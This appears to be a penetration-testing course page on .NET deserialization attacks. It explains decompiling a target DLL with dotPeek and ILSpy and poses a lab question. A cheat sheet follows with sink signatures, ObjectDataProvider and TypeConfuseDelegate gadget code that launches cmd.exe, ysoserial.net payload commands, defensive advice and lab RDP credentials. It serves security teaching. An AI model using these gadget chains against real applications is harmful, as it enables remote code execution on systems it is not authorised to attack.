Advanced Deserialization Attacks

Decompiling .NET Applications

Introduction

As input for this penetration test, we have been provided with the deployment files of the web application, which were written using C#/.NET (see the file attached to the question at the bottom of this page). This is fine for us, since .NET applications are compiled into intermediate code, known as Common Intermediate Language (also referred to as Microsoft intermediate language (MSIL) or Intermediate Language (IL)), which, unless obfuscated, typically decompiles very nicely, resulting in code very similar to the original.

There is a large selection of tools that can be used to decompile .NET applications; popular ones include:

Jet Brains dotPeek (Free, Windows-only)
ILSpy (Open-source, Cross-platform)

Note: This and the upcoming two sections provide a pre-customized Windows VM with all the required tools and customizations; utilize it to your advantage throughout the module. However, it is also recommended that you know how to set up these required tools yourself.

dotPeek

Installing dotPeek

Let's install dotPeek so that we can decompile the target application. We can download the installer for free from Jet Brain's Website and start the installation process. During installation, we can skip all products except for dotPeek.

Alternatively, we can simply select the portable version from the same download page to skip any installation process.

Decompiling with dotPeek

Once we have dotPeek open, we can select File > Open and then select bin\TeeTrove.dll in the file explorer. At this point, dotPeek will add the assembly and class list to the Assembly Explorer on the left side of the window.

From this pane, we can expand namespaces and double-click on classes to view the decompiled source code in the main window pane. Since decompilation is not a perfect process, there will be some code snippets that will look strange, like the line highlighted with the red rectangle in the image below.

By right-clicking on the TeeTrove assembly in the Assembly Explorer window, we can select Export to Project to save the decompiled source files to disk (as a Visual Studio solution in this case). This can be useful later, in case you want to use another tool to analyze/search through the source code.

ILSpy

Installing ILSpy

We can download the latest ILSpy release by heading to the project's GitHub repository's release page. If you would prefer a portable version, select the selfcontained ZIP file. If you would prefer to install ILSpy, then select the first -x64.msi file. Your browser may issue a warning about downloading a MSI file, but this can be ignored. Once downloaded, we can click through the installation process, keeping all default values.

Decompilng with ILSpy

Once installed, the decompilation process with ILSpy is very similar to dotPeek; hit File > Open and then select the DLL file bin\TeeTrove.dll in the file explorer window. The .NET assembly will be added to the Assemblies window on the left-hand side of the screen, and some assembly information will be displayed in the main window.

Using the Assemblies window, similar to dotPeek, we can navigate the namespaces and classes, and we can select individual ones to view the decompiled source code in the main window. You may notice that the output varies from dotPeek in certain places, for example, the Index function below compared to the Index function according to dotPeek above. In this case, ILSpy gave us output that is closer to the original code.

By right-clicking on the TeeTrove assembly in the Assemblies window, we can select Save Code to save the decompiled source files so that they can be opened with other tools.

Note: Opting for TCP instead of UDP for the VPN connection to the Windows VM enhances connectivity and prevents (potential) network issues.

VPN Servers

Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.

All VM instances associated with the old VPN Server will be terminated when switching to a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.

PROTOCOL

UDP 1337

TCP 443

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Target: Click here to spawn the target system!

Download VPN Connection File

RDP to with user "htb-admin" and password "HTB_@cademy_admin!"

+ 7 Use the tool of your choice to decompile TeeTrove.dll. What is the value of the variable 'AUTH_COOKIE_SECRET' in 'TeeTrove.Authentication.AuthCookieUtil'?

+10 Streak pts

TeeTrove.Publish.zip

Previous Next

Go to Questions

Introduction

Skills Assessment

My Workstation

OFFLINE

/ 1 spawns left

Cheat Sheet

The cheat sheet is a useful command reference for this module.

Identifying Deserialization Vulnerabilities

White-Box

Serializer	Example	Reference
BinaryFormatter	`.Deserialize(...)`	Microsoft
fastJSON	`JSON.ToObject(...)`	GitHub
JavaScriptSerializer	`.Deserialize(...)`	Microsoft
Json.NET	`JsonConvert.DeserializeObject(...)`	Newtonsoft
LosFormatter	`.Deserialize(...)`	Microsoft
NetDataContractSerializer	`.ReadObject(...)`	Microsoft
ObjectStateFormatter	`.Deserialize(...)`	Microsoft
SoapFormatter	`.Deserialize(...)`	Microsoft
XmlSerializer	`.Deserialize(...)`	Microsoft
YamlDotNet	`.Deserialize<...>(...)`	GitHub

Black-Box

For .NET Applications we can keep an eye out for the following:

Base64-encoded strings beginning with AAEAAAD/////
Strings containing $type
Strings containg __type
Strings containg TypeObject

Regarding Java Applications, the following cases are interesting:

Bytes containing AC ED 00 05
Base64-encoded string containg rO0

Exploiting Deserialization Vulnerabilities

ObjectDataProvider

using System.Windows.Data;

namespace ODPExample
{
    internal class Program
    {
        static void Main(string[] args)
        {
            ObjectDataProvider odp = new ObjectDataProvider();
            odp.ObjectType = typeof(System.Diagnostics.Process);
            odp.MethodParameters.Add("C:\\Windows\\System32\\cmd.exe");
            odp.MethodParameters.Add("/c calc.exe");
            odp.MethodName = "Start";
        }
    }
}

TypeConfuseDelegate

Delegate stringCompare = new Comparison<string>(string.Compare);
Comparison<string> multicastDelegate = (Comparison<string>) MulticastDelegate.Combine(stringCompare, stringCompare);
IComparer<string> comparisonComparer = Comparer<string>.Create(multicastDelegate);

FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
object[] invoke_list = multicastDelegate.GetInvocationList();
invoke_list[1] = new Func<string, string, Process>(Process.Start);
fi.SetValue(multicastDelegate, invoke_list);

SortedSet<string> sortedSet = new SortedSet<string>(comparisonComparer);
sortedSet.Add("/c calc");
sortedSet.Add("C:\\Windows\\System32\\cmd.exe");

YSoSerial.NET

-f to specify the Formatter, e.g. Json.NET, XmlSerializer, BinaryFormatter
-g to specify the Gadget, e.g. ObjectDataProvider, TypeConfuseDelegate
-c to specify the Command, e.g. calc
-o to specify the Output mode, e.g. Base64 or Raw for plaintext

.\ysoserial.exe -f [Formatter] -g [Gadget] -c [Command] -o [Output]

E.g.:
.\ysoserial.exe -f Json.Net -g ObjectDataProvider -c "notepad" -o Raw
.\ysoserial.exe -f XmlSerializer -g ObjectDataProvider -c "notepad" -o Raw
.\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c 'notepad' -o base64

Defending against Deserialization Vulnerabilities

Avoid Deserializing User Input
Avoid Unecessary Deserialization
Use Secure Serialization Mechanisms
Use Explicit Types
Use Signed Data
Least Possible Privileges

Advanced Deserialization Attacks

Decompiling .NET Applications

Introduction

dotPeek

Installing dotPeek

Decompiling with dotPeek

ILSpy

Installing ILSpy

Decompilng with ILSpy

Questions

Table of Contents

Introduction

Identifying Deserialization Vulnerabilities

Exploiting Deserialization Vulnerabilities

Defending against Deserialization Vulnerabilities

Skills Assessment

My Workstation